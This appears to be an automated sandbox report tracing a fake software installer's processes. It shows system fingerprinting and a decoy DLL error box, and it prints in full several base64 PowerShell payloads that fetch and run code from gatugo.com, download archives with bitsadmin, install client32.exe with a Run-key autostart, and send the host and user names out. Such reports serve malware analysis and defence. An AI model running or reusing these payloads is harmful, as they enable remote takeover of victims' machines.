description pid Process procid_target PID 3568 wrote to memory of 3828 3568 msiexec.exe 80 PID 3568 wrote to memory of 3828 3568 msiexec.exe 80 PID 3568 wrote to memory of 3828 3568 msiexec.exe 80 PID 4700 wrote to memory of 1620 4700 Setup_Installer_1.3.6_x64.exe 81 PID 4700 wrote to memory of 1620 4700 Setup_Installer_1.3.6_x64.exe 81 PID 4700 wrote to memory of 1620 4700 Setup_Installer_1.3.6_x64.exe 81 PID 3568 wrote to memory of 3744 3568 msiexec.exe 85 PID 3568 wrote to memory of 3744 3568 msiexec.exe 85 PID 3568 wrote to memory of 940 3568 msiexec.exe 87 PID 3568 wrote to memory of 940 3568 msiexec.exe 87 PID 3568 wrote to memory of 940 3568 msiexec.exe 87 PID 3568 wrote to memory of 2012 3568 msiexec.exe 91 PID 3568 wrote to memory of 2012 3568 msiexec.exe 91 PID 3568 wrote to memory of 2012 3568 msiexec.exe 91 PID 1696 wrote to memory of 1064 1696 Setup_Installer_1.3.6_x64.exe 92 PID 1696 wrote to memory of 1064 1696 Setup_Installer_1.3.6_x64.exe 92 PID 1696 wrote to memory of 1064 1696 Setup_Installer_1.3.6_x64.exe 92 PID 3568 wrote to memory of 4608 3568 msiexec.exe 93 PID 3568 wrote to memory of 4608 3568 msiexec.exe 93 PID 3568 wrote to memory of 4608 3568 msiexec.exe 93 PID 3568 wrote to memory of 1624 3568 msiexec.exe 102 PID 3568 wrote to memory of 1624 3568 msiexec.exe 102 PID 3568 wrote to memory of 1624 3568 msiexec.exe 102 PID 3592 wrote to memory of 3088 3592 Setup_Installer_1.3.6_x64.exe 103 PID 3592 wrote to memory of 3088 3592 Setup_Installer_1.3.6_x64.exe 103 PID 3592 wrote to memory of 3088 3592 Setup_Installer_1.3.6_x64.exe 103 PID 3568 wrote to memory of 4976 3568 msiexec.exe 104 PID 3568 wrote to memory of 4976 3568 msiexec.exe 104 PID 3568 wrote to memory of 4976 3568 msiexec.exe 104 PID 3568 wrote to memory of 4276 3568 msiexec.exe 105 PID 3568 wrote to memory of 4276 3568 msiexec.exe 105 PID 3568 wrote to memory of 4276 3568 msiexec.exe 105 PID 4276 wrote to memory of 3056 4276 install.exe 106 PID 4276 wrote to memory of 3056 4276 install.exe 106 PID 4276 wrote to memory of 3056 4276 install.exe 106 PID 3056 wrote to memory of 4620 3056 javaw.exe 107 PID 3056 wrote to memory of 4620 3056 javaw.exe 107 PID 3056 wrote to memory of 4620 3056 javaw.exe 107 PID 4620 wrote to memory of 4608 4620 cmd.exe 109 PID 4620 wrote to memory of 4608 4620 cmd.exe 109 PID 4620 wrote to memory of 4608 4620 cmd.exe 109 PID 4620 wrote to memory of 2176 4620 cmd.exe 110 PID 4620 wrote to memory of 2176 4620 cmd.exe 110 PID 3056 wrote to memory of 2632 3056 javaw.exe 111 PID 3056 wrote to memory of 2632 3056 javaw.exe 111 PID 3056 wrote to memory of 2632 3056 javaw.exe 111 PID 2632 wrote to memory of 912 2632 cmd.exe 113 PID 2632 wrote to memory of 912 2632 cmd.exe 113 PID 2632 wrote to memory of 912 2632 cmd.exe 113 PID 2632 wrote to memory of 4048 2632 cmd.exe 114 PID 2632 wrote to memory of 4048 2632 cmd.exe 114 PID 2632 wrote to memory of 4048 2632 cmd.exe 114 PID 2632 wrote to memory of 5068 2632 cmd.exe 115 PID 2632 wrote to memory of 5068 2632 cmd.exe 115 PID 2632 wrote to memory of 5068 2632 cmd.exe 115 PID 3056 wrote to memory of 540 3056 javaw.exe 117 PID 3056 wrote to memory of 540 3056 javaw.exe 117 PID 3056 wrote to memory of 540 3056 javaw.exe 117 PID 540 wrote to memory of 4552 540 cmd.exe 119 PID 540 wrote to memory of 4552 540 cmd.exe 119 PID 540 wrote to memory of 4552 540 cmd.exe 119 PID 540 wrote to memory of 4700 540 cmd.exe 120 PID 540 wrote to memory of 4700 540 cmd.exe 120 PID 540 wrote to memory of 4700 540 cmd.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731192677 " AI_EUIMSI=""2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1620
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 292741160E5CF6CA2598F61EACF77561 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3828
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:3744
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32E19A5DB6013FF8C507918C602C82052⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:940
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 13E67165B3A95CC20BA6C6831F578A0C C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2012
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 96C093BADE6DADA41CB9D931F027B1E12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4608
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 63D46283B43D3F4487420F00C94844C1 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1624
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 319F737CD11F04D840E95A7FE81B487C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4976
-
-
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\install.exe"C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\install.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\jre\bin\javaw.exe"C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650015⤵
- System Location Discovery: System Language Discovery
PID:4608
-
-
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"5⤵PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8665⤵
- System Location Discovery: System Language Discovery
PID:912
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List5⤵
- System Location Discovery: System Language Discovery
PID:4048
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com5⤵
- System Location Discovery: System Language Discovery
PID:5068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8665⤵
- System Location Discovery: System Language Discovery
PID:4552
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List5⤵
- System Location Discovery: System Language Discovery
PID:4700
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com5⤵
- System Location Discovery: System Language Discovery
PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"4⤵
- System Location Discovery: System Language Discovery
PID:1196 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8665⤵
- System Location Discovery: System Language Discovery
PID:1720
-
-
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List5⤵
- System Location Discovery: System Language Discovery
PID:3360
-
-
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com5⤵
- System Location Discovery: System Language Discovery
PID:4820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""4⤵
- System Location Discovery: System Language Discovery
PID:4596 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650015⤵
- System Location Discovery: System Language Discovery
PID:4816
-
-
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"5⤵PID:4280
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uV2luZG93cy5Gb3JtcwpbU3lzdGVtLldpbmRvd3MuRm9ybXMuTWVzc2FnZUJveF06OlNob3coIlRoZSBjb2RlIGV4ZWN1dGlvbiBjYW5ub3QgcHJvY2VlZCBiZWNhdXNlIE1TVkNQMTQwLmRsbCB3YXMgbm90IGZvdW5kLiBSZWluc3RhbGxpbmcgdGhlIHByb2dyYW0gbWF5IGZpeCB0aGlzIHByb2JsZW0uIiwgIlN5c3RlbSBFcnJvciIsIFtTeXN0ZW0uV2luZG93cy5Gb3Jtcy5NZXNzYWdlQm94QnV0dG9uc106Ok9LLCBbU3lzdGVtLldpbmRvd3MuRm9ybXMuTWVzc2FnZUJveEljb25dOjpFcnJvciwgW1N5c3RlbS5XaW5kb3dzLkZvcm1zLk1lc3NhZ2VCb3hEZWZhdWx0QnV0dG9uXTo6QnV0dG9uMSwgW1N5c3RlbS5XaW5kb3dzLkZvcm1zLk1lc3NhZ2VCb3hPcHRpb25zXTo6RGVmYXVsdERlc2t0b3BPbmx5KQ==')); Invoke-Expression $script}"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3924
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGY9J2h0dHBzOi8vZ2F0dWdvLmNvbS9oZWFsdGgucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtOZXQuU0VydkljRXBPSW50TUFOYWdlUl06OlNFY1VySXR5cHJvVG9Db2wgPSBbbkV0LlNFQ1VyaVRZUHJPVG9jT0x0eXBFXTo6VExTMTI7ICRnb2cgPSBpd3IgJGYgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkZ29nLkNvbnRlbnQ7')); Invoke-Expression $script}"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nopro -EXE BYpAss -wiN H -encOdEdC JAAyAHUAQgB2AHIAOAA9ACcAaAB0AHQAcAA6AC8ALwBnAGEAdAB1AGcAbwAuAGMAbwBtAC8AcABhAHoALwBwAGEAbgA0AC4AegBpAHAAJwA7ACAAJAA5AFIANABUADQAawBTAEUAPQAnAGgAdAB0AHAAOgAvAC8AZwBhAHQAdQBnAG8ALgBjAG8AbQAvAHAAYQB6AC8AcABhAG4AMQAuAHoAaQBwACcAOwAgACQAaABvAG4AMgBZAGkAQwA9ACcAbgB2AEgANAB0AGoAcQBzAC4AegBpAHAAJwA7ACAAJABFAEgATgB5ADYAOAAwAFQAPQAnAFAAVgBNAHQASwBUAEcAZwAuAHoAaQBwACcAOwAgACQAZgBmAFkAZgBvAGMAVwA9ACcAaQB5AHEAMQBtAGkATQBvAC4AegBpAHAAJwA7ACAAJAAyAFYASQBNAGIAOAA9ACcAaAB0AHQAcAA6AC8ALwBnAGEAdAB1AGcAbwAuAGMAbwBtAC8AcABhAHoALwBwAGEAbgAzAC4AegBpAHAAJwA7ACAAJAA5AGoAdABzAEwAUQA9ACcAaAB0AHQAcAA6AC8ALwBnAGEAdAB1AGcAbwAuAGMAbwBtAC8AcABhAHoALwBwAGEAbgAyAC4AegBpAHAAJwA7ACAAJABqAE0ASwBMAGYAaABLAEkAPQBnAEUAVAAtAEMATwBtAE0AQQBuAGQAIABTAFQAQQBSAHQALQBCAGkAVABTAHQAcgBBAG4AUwBGAGUAUgAgAC0ARQByAFIATwByAGEAQwB0AGkATwBOACAAcwBJAGwAZQBOAHQAbAB5AGMATwBuAFQAaQBuAHUAZQA7ACAAJABTAEsAMgA2AEcAMAA9ACcASABhAHIAZABEAGkAcwBrAEgAZQBhAGwAdABoACcAOwAgAEMAZAAgACQAZQBOAHYAOgBhAFAAcABEAEEAdABhADsAIABbAG4ARQB0AC4AcwBFAHIAVgBJAGMARQBQAG8AaQBOAHQAbQBBAE4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AFIAaQB0AFkAcAByAE8AdABPAGMAbwBsACAAPQAgAFsAbgBlAFQALgBTAEUAYwB1AHIAaQB0AFkAUAByAE8AdABPAEMATwBsAHQAeQBwAGUAXQA6ADoAVABsAFMAMQAyADsAIAAkAEQARwByAGUASwBqAGMAWgA9AGcAYwBtACAAZQBYAHAAYQBuAGQALQBhAHIAYwBoAEkAVgBFACAALQBlAHIAUgBvAFIAYQBjAFQASQBPAG4AIABzAGkAbABFAG4AdABMAHkAQwBvAG4AdABJAG4AdQBFADsAIAAkAHAAbABmADEARwBTAFEAPQAnAGUANwBXAGMAcwBNAFEALgB6AGkAcAAnADsAIAAkAE8ARgBLADcAcQB0AD0AJABFAE4AVgA6AGEAcABQAEQAYQB0AEEAKwAnAFwAJwArACQAZgBmAFkAZgBvAGMAVwA7ACAAJABHAFIAawA5ADAAbABSAHEAPQBqAG8AaQBuAC0AUABBAHQAaAAgAC0AUABBAHQAaAAgACQARQBOAFYAOgBBAFAAUABEAEEAVABBACAALQBjAGgAaQBsAEQAUABhAHQAaAAgACQAcABsAGYAMQBHAFMAUQA7ACAAJABTAEMASQBPAEQAMABwAFEAPQAiACQAZQBOAFYAOgBhAHAAUABkAGEAVABhAFwAJABoAG8AbgAyAFkAaQBDACIAOwAgACQAeQBYADkARQBwAEoASwA9ACQARQBOAFYAOgBhAHAAUABEAGEAdABBACsAJwBcACcAKwAkAEUASABOAHkANgA4ADAAVAA7ACAAJAB3AHYAdgBwAHkAOQBXAEEAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4ARQB4AEUAIAAvAHQAUgBhAG4AUwBGAEUAcgAgAEgAbABOAFcANwA3AG8AIAAvAGQATwBXAG4AbABvAGEARAAgAC8AcAByAEkATwBSAGkAdAB5ACAATgBvAFIAbQBhAGwAIAAkADIAVgBJAE0AYgA4ACAAJABTAEMASQBPAEQAMABwAFEAIgA7ACAAJAA3ADYAYwA0AEoAZQA9ACIAQgBpAFQAUwBBAGQATQBJAE4ALgBlAFgAZQAgAC8AVABSAGEATgBTAGYARQByACAAeABPAFYANAAyAGMATAAgAC8ARABvAHcATgBsAG8AYQBkACAALwBwAHIAaQBvAFIAaQBUAHkAIABOAG8AcgBtAGEAbAAgACQAMgB1AEIAdgByADgAIAAkAHkAWAA5AEUAcABKAEsAIgA7ACAAJABKAGoANQBnAEMANgBHAFoAPQAnAGIASQBUAHMAYQBkAE0ASQBOAC4AZQB4AGUAIAAvAFQAUgBBAG4AcwBGAEUAUgAgAEQAeQBDAEkAUgBEAG8AIAAvAGQAbwBXAE4ATABvAGEAZAAgAC8AcAByAGkAbwBSAEkAdABZACAAbgBPAHIATQBBAGwAIAAnACsAJAA5AGoAdABzAEwAUQArACcAIAAnACsAJABHAFIAawA5ADAAbABSAHEAOwAgACQAYwBoAEQAVABKAGwAPQAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQArACcAXAAnACsAJABTAEsAMgA2AEcAMAA7ACAAJABPAEwAbwB6AEkAWAA9ACcAQgBpAFQAUwBBAGQATQBJAE4ALgBlAFgAZQAgAC8AVABSAGEATgBTAGYARQByACAAeABPAFYANAAyAGMATAAgAC8ARABvAHcATgBsAG8AYQBkACAALwBwAHIAaQBvAFIAaQBUAHkAIABOAG8AcgBtAGEAbAAnACwAIAAkADkAUgA0AFQANABrAFMARQAsACAAJABPAEYASwA3AHEAdAAgAC0AagBPAEkAbgAgACcAIAAnADsAIABpAEYAIAAoACQARABHAHIAZQBLAGoAYwBaACkAIAB7ACAASQBmACAAKAAkAGoATQBLAEwAZgBoAEsASQApACAAewAgAFMAVABBAHIAdAAtAEIAaQB0AHMAdAByAGEAbgBzAGYARQByACAALQBTAE8AVQBSAGMAZQAgACQAOQBqAHQAcwBMAFEAIAAtAGQARQBzAFQASQBuAGEAdABJAG8ATgAgACQARwBSAGsAOQAwAGwAUgBxADsAIABTAHQAQQBSAFQALQBiAEkAVABTAFQAcgBBAE4AUwBGAEUAcgAgAC0AcwBPAFUAcgBDAEUAIAAkADkAUgA0AFQANABrAFMARQAgAC0ARABlAFMAVABJAG4AYQBUAGkAbwBOACAAJABPAEYASwA3AHEAdAA7ACAAUwBUAEEAUgBUAC0AQgBpAFQAcwBUAHIAQQBuAFMARgBFAFIAIAAtAHMAbwBVAHIAQwBFACAAJAAyAFYASQBNAGIAOAAgAC0ARABFAFMAVABpAG4AYQBUAEkATwBuACAAJABTAEMASQBPAEQAMABwAFEAOwAgAHMAVABhAHIAVAAtAGIASQB0AFMAVAByAEEATgBzAEYAZQByACAALQBzAG8AVQByAEMARQAgACQAMgB1AEIAdgByADgAIAAtAEQARQBzAHQAaQBuAGEAVABpAE8AbgAgACQAeQBYADkARQBwAEoASwA7ACAAfQAgAEUATABzAEUAIAB7AGkAZQB4ACAALQBjAG8AbQBtAGEAbgBkACAAJAA3ADYAYwA0AEoAZQA7ACAASQBuAFYATwBrAEUALQBFAFgAUABSAGUAUwBzAEkATwBOACAALQBjAE8AbQBtAGEATgBkACAAJABKAGoANQBnAEMANgBHAFoAOwAgAGkAZQB4ACAALQBDAG8ATQBNAEEAbgBkACAAJAB3AHYAdgBwAHkAOQBXAEEAOwAgAGkAZQB4ACAALQBjAG8AbQBtAGEAbgBkACAAJABPAEwAbwB6AEkAWAA7ACAAfQAgAEUAWABwAGEAbgBkAC0AYQByAGMASABpAFYARQAgAC0AUABBAFQAaAAgACQATwBGAEsANwBxAHQAIAAtAEQARQBTAHQAaQBOAGEAVABJAG8AbgBQAEEAVABoACAAJABjAGgARABUAEoAbAA7ACAARQBYAHAAQQBOAGQALQBhAFIAQwBIAGkAVgBFACAALQBQAGEAVABoACAAJABTAEMASQBPAEQAMABwAFEAIAAtAGQAZQBTAHQASQBuAEEAdABpAE8AbgBQAGEAdABoACAAJABjAGgARABUAEoAbAA7ACAAZQBYAFAAYQBOAEQALQBhAFIAQwBIAEkAVgBFACAALQBwAEEAdABoACAAJABHAFIAawA5ADAAbABSAHEAIAAtAGQAZQBzAFQASQBOAGEAVABpAG8AbgBwAEEAVABoACAAJABjAGgARABUAEoAbAA7ACAARQBYAFAAQQBuAEQALQBBAFIAYwBIAGkAdgBFACAALQBQAGEAVABoACAAJAB5AFgAOQBFAHAASgBLACAALQBkAGUAUwBUAEkAbgBhAFQAaQBvAG4AUABhAFQASAAgACQAYwBoAEQAVABKAGwAOwAgAFIATQAgAC0AcABhAHQASAAgACQATwBGAEsANwBxAHQAOwAgAFIARAAgAC0AUABhAHQASAAgACQARwBSAGsAOQAwAGwAUgBxADsAIABSAEQAIAAtAHAAYQBUAGgAIAAkAHkAWAA5AEUAcABKAEsAOwAgAHIAaQAgAC0AUABhAFQAaAAgACQAUwBDAEkATwBEADAAcABRADsAIAB9ACAAZQBsAFMAZQAgAHsAIAAkAEUAMQBjAE8AOABFAEEAPQBAACgAJwBUAEMAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcALAAgACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAEgAVABDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcALAAgACcAbgBzAGsAYgBmAGwAdAByAC4AaQBuAGYAJwApADsAIAAkAEsAUABBAE8AbABsAD0AJwBoAHQAdABwADoALwAvAGcAYQB0AHUAZwBvAC4AYwBvAG0ALwBwAGEAbgAvACcAOwAgAE4ARQBXAC0AaQB0AGUATQAgAC0AcABhAFQASAAgACQAZQBuAFYAOgBhAFAAUABkAEEAdABhACAALQBOAGEATQBlACAAJABTAEsAMgA2AEcAMAAgAC0AaQB0AEUATQBUAHkAcABlACAAJwBkAGkAcgBlAGMAdABvAHIAeQAnADsAIABpAGYAIAAoACQAagBNAEsATABmAGgASwBJACkAIAB7ACAAJABFADEAYwBPADgARQBBACAAfAAgAEYAbwBSAEUAYQBjAEgAIAB7ACAAJABpAGkAbQByAE8AWABZAD0AJABLAFAAQQBPAGwAbAArACQAXwA7ACAAJABQADMAMwB6AGcAcwA9ACQAYwBoAEQAVABKAGwAKwAnAFwAJwArACQAXwA7ACAAUwB0AGEAcgB0AC0AQgBJAHQAUwB0AHIAYQBuAFMAZgBlAHIAIAAtAFMATwBVAHIAQwBlACAAJABpAGkAbQByAE8AWABZACAALQBkAGUAUwBUAGkATgBhAFQASQBPAE4AIAAkAFAAMwAzAHoAZwBzADsAIAB9ADsAfQAgAGUATABzAGUAIAB7ACAAJABFADEAYwBPADgARQBBACAAfAAgAGYATwBSAGUAYQBjAGgALQBvAGIASgBFAGMAdAAgAHsAIAAkAGkAaQBtAHIATwBYAFkAPQAkAEsAUABBAE8AbABsACsAJABfADsAIAAkAFAAMwAzAHoAZwBzAD0AIgAkAGMAaABEAFQASgBsAFwAJABfACIAOwAgACQAcwBlAFkAYwB5AFYAPQAnAEIAaQB0AHMAQQBEAE0AaQBuAC4AZQBYAGUAIAAvAHQAUgBhAG4AcwBmAGUAcgAgADEAMQB4AEMAUwBxAGMAIAAvAEQAbwB3AG4AbABPAEEARAAgAC8AUAByAEkATwBSAGkAdABZACAATgBPAHIATQBBAGwAIAAnACwAIAAkAGkAaQBtAHIATwBYAFkALAAgACQAUAAzADMAegBnAHMAIAAtAGoATwBJAG4AIAAnACAAJwA7ACAAaQBlAHgAIAAtAEMAbwBNAE0AQQBuAGQAIAAkAHMAZQBZAGMAeQBWADsAfQA7ACAAfQA7ACAAfQA7ACAAJAA0AHEARwBvAGIAUwBDAD0ARwBlAHQALQBpAFQARQBtACAAJABjAGgARABUAEoAbAAgAC0ARgBPAHIAYwBFADsAIAAkADQAcQBHAG8AYgBTAEMALgBBAHQAVAByAGkAYgB1AHQAZQBTAD0AJwBIAGkAZABkAGUAbgAnADsAIAAkAFoAVAAzAEcARgBhAD0ASgBPAGkATgAtAFAAQQB0AEgAIAAtAFAAQQBUAEgAIAAkAGMAaABEAFQASgBsACAALQBjAGgASQBsAEQAUABhAFQASAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwA7ACAAQwBkACAAJABjAGgARABUAEoAbAA7ACAATgBlAFcALQBpAHQARQBtAHAAUgBvAFAAZQBSAFQAeQAgAC0AUABhAHQASAAgACcASABLAGMAVQA6AFwAcwBPAGYAVAB3AGEAUgBlAFwATQBpAEMAUgBvAFMATwBGAHQAXABXAGkATgBEAG8AVwBTAFwAYwBVAHIAcgBlAG4AVABWAEUAUgBzAGkATwBOAFwAUgB1AG4AJwAgAC0ATgBhAE0AZQAgACQAUwBLADIANgBHADAAIAAtAFYAQQBMAHUARQAgACQAWgBUADMARwBGAGEAIAAtAFAAUgBvAFAAZQByAFQAeQB0AHkAUABlACAAJwBTAHQAcgBpAG4AZwAnADsAIABTAFQAQQByAFQAIABjAEwASQBlAE4AdAAzADIALgBFAHgARQA7ACAAJABIAE8ANwA4AD0AZwBQAHMAIABjAGwAaQBlAG4AdAAzADIAIAAtAGUAUgBSAE8AcgBBAEMAdABJAG8AbgAgAFMASQBMAEUATgB0AGwAeQBjAG8ATgB0AEkAbgBVAEUAOwAgACQAQQA5AE8AOAA9ACIAaAB0AHQAcAA6AC8ALwBnAGEAdAB1AGcAbwAuAGMAbwBtAC8AcwB0AGEAdAB6AC8AcwB0AHoALgBwAGgAcAA/AGMAcABuAG0AZQA9ACQAZQBOAFYAOgBDAE8ATQBwAHUAVABlAFIATgBBAG0AZQAmAHUAcwBuAG0AZQA9ACQARQBuAHYAOgB1AHMARQBSAE4AQQBtAEUAJgBwAGEAcgBhAG0APQAiADsAIABJAEYAIAAoACQASABPADcAOAAuAEkAZAApACAAewAgACQAYQBwAFcAVgBEAD0AJABBADkATwA4ACsAJwBQAGEAYgBiADIAJwA7ACAAaQBuAHYATwBrAGUALQBXAEUAYgBSAEUAUQB1AEUAcwB0ACAAJABhAHAAVwBWAEQAIAAtAHUAcwBlAGIAQQBzAEkAQwBwAGEAUgBzAGkATgBHADsAfQAgAGUATABzAGUAIAB7ACAAJABhAHAAVwBWAEQAPQAkAEEAOQBPADgAKwAnAFoAcwBnAFoAJwA7ACAAaQBuAHYATwBrAGUALQBXAEUAYgBSAEUAUQB1AEUAcwB0ACAAJABhAHAAVwBWAEQAIAAtAFUAUwBFAGIAYQBTAGkAYwBQAGEAcgBTAGkATgBHADsAfQA7AA==5⤵
- Blocklisted process makes network request
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4048 -
C:\Users\Admin\AppData\Roaming\HardDiskHealth\client32.exe"C:\Users\Admin\AppData\Roaming\HardDiskHealth\client32.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3036
-
-
-
-
